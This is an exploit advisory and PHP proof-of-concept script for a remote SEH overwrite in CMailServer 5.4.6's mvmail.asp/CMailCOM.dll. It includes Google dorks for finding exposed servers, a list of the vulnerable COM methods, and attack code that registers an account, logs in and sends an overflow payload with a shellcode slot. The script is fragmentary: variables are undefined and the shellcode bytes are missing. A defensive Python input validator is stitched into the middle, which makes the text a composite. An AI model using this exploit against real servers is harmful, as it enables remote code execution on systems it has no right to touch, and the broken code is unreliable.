Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)

CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote SEH overwrite
proof of concept exploit

by Nine:Situations:Group::bruiser

our site:

software site:

Google dorks:
intitle:"Mail Server CMailServer WebMail"
intitle:"Mail Server CMailServer WebMail 5.4.6"

Some notes:
This server provides an IIS/webmail interface and a registered COM component
vulnerable to multiple buffer overflows, among others in the
CMailCOM.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
This class is called by various ASP scripts inside the main folder.
I found this clear vector, look at mvmail.asp, lines 25-35:

  Set objPOP3 = CreateObject("CMailCOM.POP3.1")
  objPOP3.Login Session("User"), Session("Pass")
  Session("LoginSuccess") = objPOP3.LoginSuccess
  If Session("LoginSuccess") = 1 Then
  set rs=Server.createobject("adodb.recordset") "mailfolder",Conn,1,3
    i = 0
    arrString = Split(Request("indexOfMail"), ";", -1, 1)
    While Len(arrString(i)) <> 0
        strUID = arrString(i)
        objPOP3.MoveToFolder strUID ' <---------------- bof

By attaching OllyDbg to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approximately 13000 chars.

Exploitation is post-auth, but you can get a user account by simply
browsing the signup.asp page, which is enabled by default.
Calc.exe will run with NETWORK SERVICE privilege; check the task list. Note
that 4-5 failed exploit attempts may result in an IIS "Service
Unavailable" message.

Other attacks are possible; here is a list of locally overflowable methods:
CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there is some kind of validation (e.g. you cannot
have a username longer than 4000 chars, which could otherwise be used to
overflow the CreateUserPath method, and you cannot overflow through the
strUID argument), which greatly reduces the remote vectors. However, as
you can see, there is no filter on the "indexOfMail" one.
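The missing filter is the whole story here: mvmail.asp hands every element of "indexOfMail" to CMailCOM.POP3.MoveToFolder without checking its length or contents. The following is an added example, not code from the advisory or from CMailServer, showing the server-side validation the page should perform before touching the COM object (the same checks can be ported to VBScript in the ASP page, or run in a reverse proxy in front of the webmail). The limits MAX_UID_LEN and MAX_UIDS_PER_REQUEST and the UID alphabet in UID_RE are assumptions for the example; a real deployment would set them from the actual UID format the server generates.

```python
"""Added example (not part of the original advisory): server-side validation
of the mvmail.asp 'indexOfMail' parameter, which the advisory notes is passed
unfiltered to CMailCOM.POP3.MoveToFolder."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Policy limits are assumptions for this example.  A mailbox UID is a short
# token, so anything approaching the ~13000-byte overflow length is hostile.
MAX_UID_LEN = 64
MAX_UIDS_PER_REQUEST = 200
# Assumed UID alphabet: digits and letters only.  ';' (the list separator)
# and '/' are excluded, which also blocks path-style values.
UID_RE = re.compile(r"^[A-Za-z0-9]+$")


class InvalidIndexOfMail(ValueError):
    """Raised when the indexOfMail field fails validation."""


def parse_form_body(body: str) -> Dict[str, str]:
    """Parse an application/x-www-form-urlencoded body.

    Only '&' separates pairs; a percent-encoded ';' inside a value is data,
    not a separator.  The first occurrence of a field name wins.
    """
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), unquote_plus(value))
    return fields


def validate_index_of_mail(raw: str) -> List[str]:
    """Mirror the ASP loop (Split on ';', stop at the first empty item), but
    reject any item that could not be a legitimate UID before it would reach
    MoveToFolder."""
    uids: List[str] = []
    for item in raw.split(";"):
        if item == "":
            break  # the ASP While loop also ends at the first empty element
        if len(item) > MAX_UID_LEN:
            raise InvalidIndexOfMail(
                "uid length %d exceeds limit %d" % (len(item), MAX_UID_LEN))
        if not UID_RE.match(item):
            raise InvalidIndexOfMail(
                "uid contains characters outside the allowed set")
        uids.append(item)
        if len(uids) > MAX_UIDS_PER_REQUEST:
            raise InvalidIndexOfMail("too many uids in one request")
    return uids


def inspect_request(body: str) -> Tuple[str, str]:
    """Return ('accept', detail) or ('reject', reason) for one POST body,
    usable as a proxy/WAF decision or for log triage."""
    fields = parse_form_body(body)
    if "indexOfMail" not in fields:
        return ("accept", "no indexOfMail field")
    try:
        uids = validate_index_of_mail(fields["indexOfMail"])
    except InvalidIndexOfMail as exc:
        return ("reject", str(exc))
    return ("accept", "%d uid(s)" % len(uids))


if __name__ == "__main__":
    # Constructed sample bodies: a normal move request, an oversized element
    # of the size the advisory mentions, and a path-style value.
    samples = {
        "normal":    "User=alice&indexOfMail=12%3B15%3B",
        "oversized": "User=alice&indexOfMail=" + "A" * 13000,
        "badchars":  "User=alice&indexOfMail=..%2Fetc%3B",
    }
    for label, body in samples.items():
        print(label, inspect_request(body))
```

The length check is the one that matters for this bug; the alphabet check is defence in depth against the other CMailCOM methods the advisory lists, which take similarly unconstrained strings. Rejecting early keeps the untrusted value out of the native component entirely, which is the only reliable mitigation short of a fixed CMailCOM.dll.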

Other notes:
CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
is also vulnerable in the following methods:
AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
SetTo, SetFromUID

$argv[3] ? $port = (int) $argv[3] : $port = 80;
print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
       "by Nine:Situations:Group::bookoo\n");
$argv[2] ? print("attackin'...\n") : die ("syntax:  php ".$argv[0]." [host] [path] [[port]]\n".
                                          "example: php ".$argv[0]." /mail/    \n".
                                          "   ''    php ".$argv[0]." / 81      \n");
$url = "http://$host:$port";
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("");

//borrowed from bookoo
function send($packet,$out)  {

    global $url, $data;

    if (!extension_loaded("curl")) {
        die("you need the curl extension loaded to run...");
    }
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
    $data = curl_exec($ch);
    if (curl_errno($ch)) {
        print curl_error($ch)."\n";
    } else {
        if ($out) print($data."\n");
    }
}

$agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv: Gecko/20080623 Firefox/";
$usr="bookoo";$pwd="password";//new usr username & password, change
$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&";
$h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
$tmp=explode("Set-Cookie: ",$data);
for ($i=1; $i<count($tmp);$i++){
    $tmpi=explode(" ",$tmp[$i]);
    $sess=$tmpi[0];
    $pos=strpos($sess, "ASPSESSIONID");
    if ($pos === true) break;
    echo $sess."\n";
}
$d  ="User=$usr&Pass=$pwd&SaveUserPass=on";
$h ="POST ".$path."login.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
//bad chars: \x3b \x2f
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=Pex
$shellcode =
$seh="\xf1\xda\x02\x10"; #0x1002DAF1    cmailcom.dll / pop ecx - pop - ret
$bof= $nop . $jmp_short. $seh . str_repeat("\x90",24). $shellcode ;
$h ="POST ".$path."mvmail.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";

# [2008-07-06]